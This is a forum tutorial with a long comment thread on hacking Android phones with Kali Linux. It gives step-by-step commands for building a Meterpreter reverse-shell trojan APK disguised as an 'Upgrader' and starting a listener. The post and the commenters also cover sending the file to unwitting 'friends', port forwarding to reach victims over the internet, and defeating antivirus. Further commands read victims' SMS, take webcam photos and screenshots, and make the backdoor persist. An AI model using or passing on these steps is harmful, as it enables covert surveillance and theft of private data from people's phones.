How To: Hack Android Using Kali (Remotely)

Hack Android Using Kali (Remotely)

How to Hack Android Using Kali (Remotely)

Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.

Thank You!
F.E.A.R.

633 Comments

Hi,

You'd need to include something in the email telling them how to enable Unknown Sources, correct? Most phones won't have this enabled by default. Just thought I might add that you need this feature enabled for the apk to run.

Nathan

Most of the modern phone 'users' have this option enabled already.
But, Thank You NATHAN for mentioning, I'll make the changes.

did you make a tutorial on that issue? I am interested in finding out how to go around this.

Hello F.E.A.R, I am completely new on this but wouldn't building the trojan with my public IP generate a direct communication to my modem which could be used to track me down? If so, how could that be avoided? Thank you very much!

Although I have enable the option of unknown sources the apk file is not getting open on the android device what could be the reason? however It gets open on blackberry Q5 though attack was not successful

meterpreter > dumpsms download
* Fetching 90 sms messages

  • Error getting messages: stdapisysconfigsysinfo: Operation failed: 1
  • plzz solve this error while andriod device hack
  • ing

I followed all the steps but at the end after entering the command "exploit" later i get stuck in loaing payload handler" solution

Help.

me too ..... i dont get any response

How could this possibly work on WAN if you do not add a reference to your listening server as in:
'Even if you are hacking on WAN type your private/internal IP here not the public/external'

Am I missing something?

Yes you are my friend,

In the first terminal where you prepare the apk file, has to be encoded with your Public/External IP , so that when the file is opened it tried to connect to specific Network

While, you have to start the listener with your Private IP because it tells the listener that, which PC in the network, will be used to control the Remote Android/PC

hello F.E.A.R thanks for writing this great article. Im pretty new at doing this and i have one problem, when i open the app on my android device it opens a meterpreter session like normal but then i get this: Failed to load extension: No module of the name extserverandroid.jar found. Is there any way to fix it?

Hi James,
You mean do you type in a module, or it happens automatically ?
Try it on another android, and then comment again.

(I had this same issue) EDIT/DELETE: Nevermind, seems to be working now... though I honestly don't know what I did differently this time. Thanks for the clear, fun tutorials!

You are Welcome Wolf.

One question. How do I send it to the victim? Do I install in my phone and then send it to the victim? I am lost at the part.

my window just gets stuck on the listening stuff .... even if i open the app i dont get any prompt here ... help me please

i use kali in vmware and i installed the app on my own phone with all permissions ..

This is really great tutorial. I will give it a try....
Thanks

You are Welcome ASANTE!

Thanks a LOT for your great tutorial !

should I port forward the LPORT in my router settings?

Welcome! MATT,
Yes you should forward LPORT (4444 and 80) in your router settings
If you have problems just tell me the company and model no. of the router.

Please help me F.E.A.R. I have tp-link wifi and cannot forward ports even though I have configured tp link from his site (my network mask), canyouseeme.org and other sites cannot detect my opened ports!

Thanks in advance.

oh and i forgot to write my subnet mask - 192.168.0.1

Hi Aiden,
Configure them from this site: http://www.portfoward.com/
Even if you have configured them correctly, your ports Will not open they will get forwarded.
Just try hacking an android/PC on WAN.
If it still doesn't work, try allowing those ports through your router's firewall or try DMZ.

Hey there,GRAT tutorials!

Btw, why should we forward port number 80? isn't that the webserver's poer?

Hi! Great tutorial sir!

I'm a complete noob at this and started learning a few days back only. I'm actually planning on running an exploit via an adobe reader or ms word document with meterpreter payload. But I need to do it on WAN (over the internet). I did it successfully on LAN but can't figure out or find good reference about how to go about it on WAN.

Could you explain the port forwarding procedure and concept in detail? Maybe help me specifically with my case..
Thank You!

Have you tried OTW's tutorial about embedding backdoors to pdf's and MS word files? You should check them out. You could also try his tutorial about adobe flash player.

Goodluck! Welcome to Null Byte!

Anytime AMAN!

1st Do you know what is public IP? If yes put the public IP in the first terminal and the private IP in the second terminal.

2nd For port forwarding you have to forward some default ports used by Kali like 4444 and 80. Do this by going to the advanced tab of your router config. Then port forwarding/triggering section or simply service section. And then forward ports accordingly.

I don't know which router do you use, please specify the name and model no. Of your router, then I can explian the steps to you.

Hey in one of your articles you mentioned you can help with port forwarding. Im having trouble pulling of a Social Engineering attack in Kali Linux because I am unable to do it over WAN because I dont know what I am doing wrong. I've seen many tutorials that try to show how to do it, but it is difficult because none of the interfaces are the same as mine. I try to figure it out and fill in the right information in where I think it's supposed to go, but the SET attack still only works over LAN even though I put in my external IP. Your help would be gratly appreciated please. The router is a Belkin router. The model number is:

F6D4230-4 v1000

Hi Ray!

Solution:
HERE

The steps are the same even if interfaces are not.

  • Use kali's Internal IP
  • Forward Ports 4444 and 8080
  • Service Type: TCP/UDP

If you are using VMware, then switch off your anti-virus's firewall.

ALSO! GOTO FIREWALL RULES(in your router's config screen), AND ALLOW THOSE SERVICES THROUGH, IF IT DOESN'T WORK.

Another SOLUTION,
If you have the default DMZ option, enable it! This will forward all the ports.

ALSO, this wont open ports, it will only forward them, so if you use some testing port open services, they will tell that the ports are closed SO, don't worry.

is port forwarding possible only in routers???? wat if i use my mobile's hotspot to run internet on kali???how do i forward ports???

Welcome to Null-Byte,
It is complex but..., here...

i understand that port forwarding is necessary for other devices to connect to us.....i dont have a router nd i use kali either on a live bootable usb or in vmware. now while using the live usb i cant connect to the internet using my data card nd so i use my mobile hotspot but in vmware i use NAT to connect.can i forward ports in vmware.

in kali i use nmap with my ip nd see dat all ports are closed.

NAT in VMware? and Port-forwarding? Not a chance.
Switch to bridged.

Comment-Edited/Deleted

I was referring to Aman because he said he was planning to do an exploit using pdf's and .doc files. That's why my reply was placed under his comment. But good to know that you've been reading OTW's posts.

(Intense Laughter)
Oops, I should have checked before answering,
Sorry Lemon, I'll edit it.

LOL. It's okay :)

Finally somebody has a tutorial about MSF on WAN ! thanks a LOT !

Sir, im using huwei BM632w router, and i have two options under NAT tab: "port forwarding" and "port mapping" .

which one should i use?

ps: they both have the same options

ARMIN:
Use port forwarding option,
Add custom service,
Name: (Any)
Type: TCP/UDP
Start Port: 4444
End Port: 4444
Apply.
If that doesn't work then:
Goto to Firewall Settings: And,

Outbound services: Select service name (the same name you put before), Action: Allow, LAN Users: Any, WAN Users : Any, LOG: Never

Apply
Inbound Services : Service Name: (same) Action:Allow ,Allow , Log: Never
Apply
If that doesn't work either let me know...

I am struggling for Port Forwarding like HELL...You wont believe how much tutorials and posts I've seen on this,but nothing succeeded for me.I've posted my problem on TP-Link,Huawei,Reliance support pages,but not yet a solution.I used Reliance 3g data card(Huawei EC156) to access internet.Then I realized port forwarding would'nt be possible without a Router.So,bought TP-Link TL-MR3420 3G Router.I port forwarded on routers page,didnt worked.Turned firewall off(both Bitdefender & Windows),not still.Switched DMZ on/off,not yet.Used couple softwares like PFConfig,Simple Port Forwarding,no luck.But still I am not losing hope.Please please if somebody knows a solution,I will be really helpful to you.I am so badly craving for Port Forwarding,only for online gaming,,and even a little of this stuff!

Did you get it fixed ? Even i'm not making any progress.

sir
im having two options port mapping and port triggering.

which one should i use?

Matt:
Go to the Port Mapping tab,there:
Put a dot into the Custom radio button.

Enter the name of the program into the Mapping Name box. It doesn't really matter what you put into this box.
Enter the port to forward into the Internal Port and the External Port boxes. (Port : 4444)

Enter the ip address to forward these ports to into the Internal Host box (IP of your hacking system).

Use the Protocol drop down box to select the protocol type of the ports you are forwarding. (Use TCP/UDP)
When you are finished, click the Apply button.
And that is it! You are done!

Source: [http://portforward.com/english/routers/port_forwarding/Huawei/BM632/defaultguide.htm

http://portforward.com/

Find your own router and follow the process, they are not all the same. Don't forget to port forward to an IP, listener's one.

Thank You Ciuffy, now I dont have to worry about it

No problem, glad I helped.

Hi FEAR,
Thanks for the interesting article.
However, being a newbie, I request your help in clarifying a few things:

1) I'm using Kali via USB (Cruzer Blade 8 GB). However, as I've been unable to install it, I'm using the Live (686-pae) option (I just selected the first option in the Boot Menu).

2) For Internet, I'm connected by data card via USB tethering (Android).

3) The problem is that every time I tether, the last three digits of my private IP address changes although the public one remains the same. So will this not create problems after the exploit on the meterpreter?

4) In Step 3: Set-Up a Listener, it says: Set up a (reverse) payload by typing : set payload android/meterpreter/reversetcp but in the sceenshot of the console below it, instead of android it is windows. Which is the correct word?

Hope to hear from you soon.

Thank you.

Welcome OMEGA7:

  • Are you sure your public IP is static(remains same)
  • Your Private IP/Public IP cannot change until your router reboots of if you restart your PC (or after everytime you tether) even if its dynamic.
  • While exploiting on LAN or even on WAN you should have no problem.
  • Just change the LHOST everytime you start up the attack.

------------------------------------------OR-----------------------------------------------

  • Simply make it static by following these steps:
  • Navigate to: /etc/network/interfaces and open it.
  • Delete this line: iface eth0 inet dhcp
  • Add this instead: iface eth0 inet static
  • Now add these to configue the static IP:(all in different lines)
  • address 192.168.0.5 (your STATIC IP)
  • netmask 255.255.255.0 (netmask: Let it be this)
  • network 192.168.0.0(Let it be this)
  • broadcast 192.168.0.255(Same)
  • gateway 192.168.0.1(Same)
  • Save it ... and restart Kali, the changes will be permanent
  • However, if the net doesn't work then you will have to put these cmds in a terminal everytime you start kali:
  • ifconfig eth0 down
  • sudo dhclient eth0
  • ifconfig eth0 up

------------------------------------DONE---------------------------------------------------

Also your last query, Thank you for pointing out the mistake in the screenshot, the correct cmd is : set payload android/...

Thanks FEAR,

You're right. I rechecked it and the public IP too keeps on changing. As I mentioned before, I'm a tyro and am starting from scratch and I'd appreciate it if you could kindly tell how to navigate to "/etc/network/interfaces". I tried right clicking etc, to no avail.

Thanks

omega 7 how did u get the data card working???
whenever i plug in my usb data card it says not able to mount???

OK Got it!
But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?

Now I've inserted the data card into a micromax modem and have wifi.

The details of the new connection are in the screen shot attached. Please let me know whether the configurations mentioned earlier are relevant to wifi connection too.

.... the attach link isn't working... when I click on it, the 'Upload New Image' link is not active... OK... Doing it the hard way...

Logging out of Kali. shall try to send you on win 7

Thanks

OK. Strange! In Kali, I couldn't upload. Please revert at your earliest.
Thanks

Sorry for the late reply Omega7,
I don't think your private IP will change after you have connected to a WiFi with that type of IP
Even if it does let it change don't worry about it, it won't interfere in the hacking process.

But if the public IP is dynamic, and you hack anything on WAN then the meterpreter prompt will stay until your router reboots(as the IP will change after reboot)

So, don't worry keep hacking!

Thanks a ton, FEAR, much appreciate it.
But what about my other query?

"But the first and second lines are:
auto lo
iface lo inet loopback

What should I do? Delete these and type in all the details that you have given or write the details without deleting these two lines?"

Thanks for your time.

Let it be same don't delete anything don't add anything,
It would work just fine(I just saw that you are using a live Kali system, so the changes will revert anyhow)
Just change both, LHOST every time you hack on LAN and on WAN.

I updated my kali to 1.1.0 and i can't use msfpayload anymore. It is telling me to use msfvenom. But I don't know the command format for msfvenom if I am trying to do this android hack.

Hi Lemon,
Well, the command for payload in msfvenom has a slight difference,
To create the apk type :

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 -r -f apk > /root/ABC.apk

I never have really use msfvenom before, I hope the command works.. If not refer this:HERE

Thanks F.E.A.R. I'm gonna try that in a little while.
Soon you will be using msfvenom since msfpayload is deprecated. And it will be removed on or about 2015-06-08.

You are always welcome Lemon,
And thanks for the info.

Hello, F.E.A.R.
Thanks for beautiful article.
But I have some problems with creation APK file.
msfpayload is deprecated!

# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.120.102 -r -f apk > /root/Update.apk
Invalid option
(copied from comment above)

# msfvenom -p android/meterpreter/reversetcp LHOST=192.168.120.102 -f apk > /root/Update.apk
Invalid Format Selected

And list of supported formats not contains APK

# msfvenom --help-formats

Executable formats: asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

Transform formats: bash, c, csharp, dw, dword, java, jsbe, jsle, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript_

Can you help me?

As I told BAD, I haven't used msfvenom, and I my have to reinstall Kali due to tech problems, so I can't test it, you should refer to OTW's post (link above?)

Try this:

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk

Hey, I followed all your steps, but when I start the.apk file, my smartphone does nothing and my screen is still by starting the payload handler. What am I doing wrong?

Hi ARCHIBALD,

  • After installing the file you also have to open it and your smartphone has to do nothing, only the meterpreter should show up
  • Are you sure you had put down the correct LHOST ?
  • Are you hacking on WAN or LAN ?
  • A screenshot would help

Hi F.EA.R,

Thanks for the fast answer. I tried this on Virtualbox, so I dunno if my LHOST is correct, it's something strange like 10.0.0.2. I'm hacking on LAN and with a smartphone with android 4.4.4 KitKat. I'll send a screenshot as fast as possible.

You have copied the LHOST by typing ifconfig in a terminal right?

----------------------------------------------------------------------------------------------------
Or if you are using a wireless adapter to connect to a router then:
----------------------------------------------------------------------------------------------------

If the LHOST is 10.0.0.2 , even that should be correct. Modern routers are using that kind of IP. (However you can change it)

...
Also, which option are you using in the virtual box for Network Adapter?
(Bridged, NAT or Host-Only)

Yeah, that's right, I used the eth0 address and copied it to the LHOST. In Virtualbox, I'm using NAT.

Switch to bridged, always keep it bridged
Edit: also tick the option- Replicate physical network connection state

HI! I'm back and have been running around in circles with the process. I got a new broadband connection set up and am using a Binatone DT 850 W router. Could you PLEASE explain everything in detail, again perhaps. The objective, getting meterpreter running on a remote system over the internet by sending a malicious file over. I would REALLY appreciate your help again sir.

Welcome back Aman,

I am assuming that you know how to go to the configuration page of the router.
(If not then: Click Here
Username: "admin" Password: "admin"or"password"or"leave it blank")
If your router's config page interface is like this:

Then follow this guide:Here

Else, give me the screenshot of you router's configuration page.

Done!
What next sir?

i see you're dong pretty well but you should explain it a bit more that would be find for beginners.. :p

I don't think there is anything more to explain in this guide, if anyone needs it, he/she is free to ask in the comment section, Right Here.

Comment-Deleted

can i have question .. After installing apk and running it .. can person uninstall it then and will be it still running?..And if android phone will be turned off and on .. do i have to just exploit or person needs to run again application?

Hi Martin,
1) If the apk is uninstalled, the session will also end.
2) If the phone is rebooted, the session will still end.
3) However there are a few tricks by which you can make the backdoor persistent.

Well, next problem:
Whatever I type in, it's showing me:
Unknown command: ls
Unknown command: webcamlist
I think you understand

Hi Archibald,
1) Type pwd or lpwd or cd sdcard then type ls, it will work.
2) And its webcam_list not webcamlist.

Hi F.E.A.R

I embed the payload/trojan into the original apk which in my case it's ADM.apk then sign it , after I install the apk it works properly and as long as the android device is connected to WiFi I can do everything from msfconsole like downloading or webcamsnap or dumpsms etc. but when I turn off the wifi and turn the mobile data on ( I set it on 2G because the victim that I want to install the apk on his phone has 2G!!!!! and I want everything to be the same as his situation) in my msfconsole I just can do the core commands like "run" and if I try all the other commands it will say something like :

Unknown command: ls
Unknown command: pwd
I just can get his ip. but the problem is when I locate him it shows the wrong location.
what should I do to make the other commands work properly on mobile data like they work properly on WiFi?
I appreciate your answers. Thanks

I'm doing something wrong on the setting of my router?

everything work when the smartphone is connect to the same wlan, but with wan it doesn't start

Thanks a lot

Hi Angelo!
You have successfully forwarded port 4444, but it seems your firewall is blocking this port.

Goto firewall in your router configuration, and Select the port/service, then Allow all the inbound and outbound rules for that service, also give the Private IP of Kali if asked.

Done! Now follow the steps correctly for WAN method.
If it does not work, get me a screenshot.

FEAR,

My android said it "Can't Open File" i set it to accept from uknown sources. But it still says it cannot open it. So i downloaded an APK installer and installed it but still cannot open it. Also does this exploit have to be done with 2 cellphones can i just copy the APK file straight rom my root folder to the download site, because i see one of your steps is to first copy the file to your android phone.

Buckeroo,
Try this on another android, if it still doesn't work then maybe the command for creation of the apk is wrong.
No, you need only one cellphone ( 2, if you are hacking using a cell)
Yes you can directly copy/upload the file from your root folder.

I have the same problem on two different android devices

Bro, Please help me out with port forwarding for this, im kind of new,

Also im having an ZTE ZXV10 W300 router, I dont have a static IP it changes every time i restart the router,

also should i install NOIP for this?

I hope your Router's Interface is like, in this guide: /here

Forward port: 4444 and 80 (or 8080)
If any problems might occur, you are free to ask.

And no you shouldn't use NOIP is doesn't make your IP static, however you can use it to keep checking on your IP. (I think every 5 min)

Wow! Thanks F.EA.R for the tut.

I tried it on one of my droids and it works. I have a question though, where is the trojan directory that it is installed in located. I tried to remove it from my android and I cant seem to find it or anything. Its like stuck on there unless I disconnect from my side. Sorry for the newb question. Thanks for everything!

Welcome! James,
The Trojan's default name is Main Activity (application name),
Search for it in the application manager, and uninstall it, from there.

hey, i'm new here and i think i did everything good but i can't find the app i created (named it upgrade.apk).

Name of Application: Main Activity (though you can change it)
EDIT: Main Activity.apk

I think u can find it in your home folder

Why Meterpreter session closes nearly after 20-30 sec. after opening and the REASON is DIED?????

Antivirus (especially CM and when you are hacking on WAN)

So what is the solution???????

Also...how to hack the android using Kali me and the going to be the 'Victim" are on different network???

Could you re-frame the question please? If you are asking hacking on WAN, this guide shows that too.

Uninstall antivirus...

The problem was resolved by uninstalling the antivirus and now have a question that.......after I forward a port in my TP-LINK WR841N router by adding a virtual service and then check for it by nmap it is giving the result that all 1000 ports are closed..why???

One more thing I noticed that whenever I try to hack my Samsung Smartphone it opens a meterpreter session and then get close after 20-30 seconds but when I try hack my Micromax Smartphone it gets hacked and I use it until I want.Do Samsung Phones are more secured????

Yes, I think Samsung smartphones have an in-built security checking system. (I faced problems with Samsung too)

Port forwarding and opening ports are two different things.
Once you've forwarded the port (4444) That means you are good to go.
(If it doesn't work, allow those ports through the Firewall of your router)

Hello!
How to port fowarding on PROLiNK H5004NK ADSL Wireless Modem?

Hi! I am having some issues with the meterpreter "webcam_snap". When I try webcam_snap 1 or webcam_snap 2 they both take a picture on the back facing camera. Do you know how I can do it on the front facing camera?

Hi! Cameron,
Hmm.. Try this: webcam_snap –I 2
Or try Streaming : webcam_stream 2
Or this: webcam_stream –I 2
When you run the command webcam_list then you get a list of two webcams (1. front camera and 2. back camera) right?

Hey man first of all I have to tell you this is an amazing tutorial a big thanx for it. Secondly I have done all the things u said but can't go beyond a step I.e near the last step it says starting payload handler and is stuck on that. What should I do to fix it NAD yeah I m a noob so a little less technically will be appreciated thanx in advance man

And ya some more tutorial are expected from you bro !! Keep on posting

Hey man so now its working but I can't take picture from the webcam it says error running command webvam snap: NoMethodError undefined method value for nil : Nil class mic recording also don't work and ya how do I read message ?? DumpSMS command doenot work !! Thanx man

you can see the available commands by typing ?

yes its true question mark.
it pops all commands available to exploit

You are welcome RAY,
The command is; webcam_snap NOT webvam_snap. Also type this: webcam_snap 1 it will work.
For messages type dump_sms instead of Dump_SMS. Tell me the error If it still doesn't work.

hi FEAR thanx for such a fast reply actually that was just typing mistake i typed exactly what you have said and the error still continues man. plus when i type help commands for android doesnot shows up. the error when i type webcamsnap 1 is

error running command webcam snap: NoMethodError undefined method value for nil : Nil class
so what should i do ? i type the correct command stills shows this one.
should i attach a snapshot of error?? thanx again man

I think you should try this on another phone, if it works, then the problem is with the phone not with your commands or Kali

n ya i am the same guy as above !! just forgot my user name so using another account !! oops!!

Your username is: christopherray

ok so how do i upload a scrrenshot??

You click on the little picture icon that says "add an image" when you hover over it.

OK then fear I tried this on another phone and most of the command are working but still none of the android commands are working man!! like dumpsms and all what am I doing wrong then??

OK then, tell me the error.. Try the checking its root (I think the cmd is check_root) If it tells the device is not rooted then the cmds may not work. (You don't need to root your device just run this cmd in meterpreter)

ryuto555# msfpayload android/meterpreter/reverse_tcp lhost=[THIS IP] R > upgrade.apk

what ip should i add here[THIS IP]if im going to hack thru WAN ?

Public/External IP

hey F.E.A.R bro, first of all thanx for the tutz ;)

i need the tutorial that working on wan, and it must be a persistant one. can you mail me the complete step to make the backdoor (wan based) and the persistent backdoor

email : solothehacker@gmail.com

Wecome! Solo Hacker

I'll be making a tutorial to that soon..Maybe today. I had it planned from the start using scripting, but I am poor in it. So I took time but nothing seemed to workout, so I gave up, until you commented. Then I remembered and took 20 hrs googling for syntaxes of commands.

Thanks to you, after ˜40 futile tries I made it to work.
Just wait a little for the tutorial. ;)

:) thank you bro. and thank you for the email. :P
the tutorial you added in that link, will it work on wan, i mean will it work through internet

Welcome! SHacker,

Yes the guide will work on WAN, until, the android system reboots or your Public IP changes (but if the phone is rooted and you have a Static IP, then it will work forever.

These things have been mentioned in the guide. (Also, the guide is here on Null-Byte)

Anytime! SHacker

Great! all other ways to make a persistence backdoor didn't work. I'm looking forward to your great tutorial. Could you please share your tutorial's link here?

hello i tried following step in backtrack 5 R3 but getting these errors..pls check it...

while creating .apk file getting error but still file created.
and while installing file on android it says "there is problem while parsing the package"
please help

You spelled android wrong while creating the payload.

this parsing error is occurring on android 5.x.x devices. on of my devices which had 4.4.2 allowed installation of androrat and the metasploit reverse tcp, however, after a upgrade to lolipop i started getting a parsing error when trying to install the RAT

Hi to everybody! Anybody knows if is something wrong with "webcamsnap" in the last version of metasploit? For me it doesn't work anymore after upgrade to Framework Version: 4.11.1-2015040202.I've try to create the payload with both "msfpayload" and "msfvenom" but I've got the same result:

"webcamstream" doesn't work neither,it open the webpage but no image it's shown.
The other commands are working well.

I'm using 3.18.0-kali3-amd64 (Kali Linux) installed on a HP 250 machine and I've try to exploit an Asus MemoPad 10 with Android 4.2.2 if that helps.

Thanx .

Hi Bobbe and Welcome to Null Byte!
Have you tried this command on another Phone/Android?
Maybe this Android System or an Anti-Virus Software installed, denies it to open/start webcam/camera.

Hi F.E.A.R and thanx.I didn't try yet but it was working just fine till I upgrade Metasploit,only with AV deactivated..I'll try to uninstall it to see if it works.Thank you again.

HI F.E.A.R,hello to everybody.I followed your suggestions but I get the same result..New device tested (Majestic branded phone tab with 4.2.2 Jelly Bean),no AV,no active firewalls but "webcamsnap" didn't work..Both tested devices are rooted..Have anybody any ideas?Anybody who use the same version of Metasploit who can confirm that the "webcamsnap" still work?Tests were made in both LAN and WAN..

Thank you!

Hello Bobbe,
Out of ideas, but if both devices are rooted, no problems should occur, I'll need some time to look into it.

HI.I'm out of ideas,too :) . I suspect some missing updates on Ruby for my version of Metasploit...or maybe is my machine that has some missing updates.I have no clue.One of this days I will try the on line version of Metasploit from Rapid7 to see if it work on it 'cos I think there it's a newest version than Kali's one..

Thanx for the answer and greets for the tutorials.Nice job!

I think uninstall metasploit and install it again. This should help.
Welcome Bobbe

Yup.But I'm not sure wich version should I install..
I think to downgrade to an oldest version..It was working fine before upgrade..
Thank you again!

I see an outdated version of ruby on my Kali...I don't know if upgrading that will help or messed up everything...What version-revision of ruby it use your metasploit?

I never updated my kali, and never will, until I know its verified, and only for custom updates (not random packages) (even metasploit)

Ruby version 1.9.1

Hello.I have to say that you are right. I've just reinstall the OS :) ,I messed up everything..now I have to test metasploit to see if it works. Thank you for the answer.Have a nice evening.

Welcome! Bob
You too have a good evening! (Its night here actually)

can we use noip on this?

I mean public IP, since we have dynamic IPs?

Hi Back,

I don't think we can use 'no-ip' on this, it takes time to refresh, but if you make the back door persistent , then, it may work!

Will try someday and let you know.

Hello , im a newbie and just beginning to learn Kali Linux,
Now , im dual booting live from a USB from my Desktop PC.

I dont find wlan as i dont have a wireless card and i think thats not a problem for now.

My IP addr is 192.168.1.101 and i can hack into any local android phone my APP is installed. But when the same app is opened by someone else from a distance of 1km or less, it dosent show up in my Kali Linux.

Another problem is can you explain me breifly how to hack them over WAN ( ie. by WAN Method ) as im really confused there.

Thanks and Regards,
xMidnightSnowx

hi folks,

i really dont check how this reversetcp works... in matter of.... when i shutdown or the owned device shut down.. this works either?

equal, i install the apk on e victims device, my Lhost is not working.. its works either? (logically not, but later) in a few hours? stops working or something like this? hows about more than 1 vic^ ... 10 on same port? can it handle 10-20? receiving host must be running is clear... etc... im a little confused ... is the Lhost almong running or is it ok to infect with the apk... like a one-hitwonder... or is it a always running gag.... thats was confusing me...

Re-frame the questions please!
My answer otherwise:
Unsinstall antivirus/Use persistent backdoor.
Yes 'it' can handle about 10, if the sessions are in background.
??

My router is TP-LINK TL-WR740N can you help me in port forwarding

My router is tp link wr74on and I am having a though time forwarding the ports. Can u help plz

Hi Guys!
Solution: Here
Use Kali's Internal IP, while forwarding ports.
EDIT: And forward ports 4444 and 8080

Is there a cammand to take a screen shot of a android device once you have exploited it ?
Or look at there chats on social networks

Just type screenshot in the Meterpreter shell.

I don't think that works does it?

Hi fear,

When i type exploit and it start then i click on the Phone the apk, i open it but doesn't work.. I tre to open The port but i don't know how

I have a netgear dgn 2200v4

Do you mean port forwarding the port? That is what you need to do for WAN.

Hi Andr,
You should mention whether you are hacking on LAN or WAN

excuse me sir . i got a problem . i always stuck at when i was configuring the WAN / wide area network. This is my screenshot always stuck at payloader handler. i try it on my smart phone but it didnt pop up on my kali . help will be appreciated . Thank you so much . sorry newbie :(

Image via akamaihd.net

Looks like you almost did everything right!
I'll ask 3 questions:
1)while creating a payload did you mention your public IP?

2)Does your router configuration page, has a firewall settings option?, if yes then allow the inbound and the outbound services through this port.(if it has a DMZ option enable that too)

3)Do you click open after you install the file on the android?
And now try it again.

Hello,

I would like to point out that I am completely new; and I am trying this tutorial. However, in following your instructions, I was directed by a message in terminal to use msfvenom. I don't know what to do. Could you help me?

Solution:HERE

Try this: msfvenom -p android/meterpreter/reverse_tcp LHOST=1.1.1.1 R > android.apk
--------BUT--------

As told by BAD in the comments above msfvenom dies not contain the apk format. So just use msfplayload, Even if it tells to use msfvenom, just ignore it, check your root directory and you should see the file still has been created.

using this command line:
sudo msfpayload android/meterpreter/reversetcp HOST=192.168.1.16 LPORT=4444 R > apss.apk

Error:
Invalid payload: android/meterpreter/reversetcp

i don't know what to do. plz help me.

I guess you arnt using Kali Linux , because this former backtrack supports android payload

'reversetcp''

Hey, i want to know if i want to send to somebody(not in the same Wireless or Wi-fi) i have to put in the Lport the external ip (public)?

Yes, but only while creating the payload.

lebz . i think if you want LAN only i think you need to put your internal IP.

Did i configured wrong ? on my router port forward ? help . cant connect at wan . Thank you

Image via akamaihd.net

Please get me a screenshot of the security options. (Firewall)

Yes exactly!
But can you access the Internet after disabling firewall?
If yes, then good!
EDIT: Bold Text

nc -lvp 12345
listening on any 12345 ...
107.20.89.142: inverse host lookup failed: Unknown server error : Connection timed out
connect to 192.168.1.36 from (UNKNOWN) 107.20.89.142 48511

No, no, this process of port forwarding only forward the ports, it does not open them, Now your port forwarding has been a success!

Just follow the whole hacking process again.
(Also enable DMZ for the host's IP)

because i saw some video in port forwarding using netcat. is it wrong ? sorry newbie

No, but I won't recommend following it.
Can you access the internet after disabling (your router's) firewall?
Have you tried the procedure again?

ya i try and stil not pop up again .

and what is DMZ sir ?

An option in advanced settings, which forwards all the ports through firewall.
EDIT: If it is not in advanced settings, go to WAN settings.

noting DMZ enable or disable on my router . :(

my router didnt have DMZ enable / disable options brother

Actually it has, I saw that from the note of your screenshot above but nevemind now

hello bro.I'm new for kali linux. i have follow all the steps above bro but i get the error
Error running command webcamsnap: NoMethodError undefined method `value' for nil:NilClass

can you please help me wit it? I have use to different android phone but still got the error can i knw why? can please help me

webcam_snap 1
webcam_snap 2

its working on lan . but kinda hard on WAN. and F.E.A.R what is this problem ?
meterpreter > webcamstream 2
* Starting...
* Preparing player...
* Opening player at: UrXlVixg.html
* Streaming...

  • webcamstart: Operation failed: 1

Nice! Antivirus is blocking the backdoor apk to access camera.

OK last try!
Exploit your android again by wan Method but this time connect the phone to the same WiFi router (Lan)

Is this exploit patched in the new android OS? I tried this on Vmware and no luck. Bridged connection/wifi/etho with kali installed on Vm. I wonder if this only works with a physical kali deployment? I recall one of my buddies did this hack in class with the USB boot of kali.

Wait seriously I'll have to check that out!
Thanks for the info Lee.

Fear, can you confirm that this exploit works on a Vm?

Yes it works on VM, and it has not been patched, however the in-built anti-virus, ends the meterpreter session quite fast!

EDIT: I cannot get enough time to initialize persistence.

My mistake FEAR, my firewall was indeed blocking me from the exploit. I noticed in bridged mode, I was able to ping Google's DNS but unable to actually browse the web; due to the firewall. Thanks for tutorial, now working both LAN and WAN for me.

Glad, it worked out!
Welcome!

i got still problem on WAN :| on LAN is GOOD but on WAN . i didnt see my smartphone on my kali response :(

hi!

I successfully installed Kali on VirtualBox and when put the "msfpayload android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk" command, it shows me an error "bash : /root/Upgrader.apk : Permission denied"

I even tried changing the root folder properties (since am new to linux, I have a very little idea about superuser and stuff), but nothing is available in either of the folders' permissions tab. it says that I'm not the owner.

what next? help!

Hi!
?
Log into host (Kali) as root. (admin)
I mean:
Username: root
Password: "whatever you had entered" OR toor

Can i rename the .apk to anything i want ? i mean if the apk installed already . the name of apk is MainActivity can i rename it anything i want ?

Maybe yes, maybe not.
I already tried that, with many fails. Still trying...
But I don't think so, this application, every application, compiles like this by default.

when i try to run exploit command, it says unknown command.

my version of msfconsole is 4.10.0

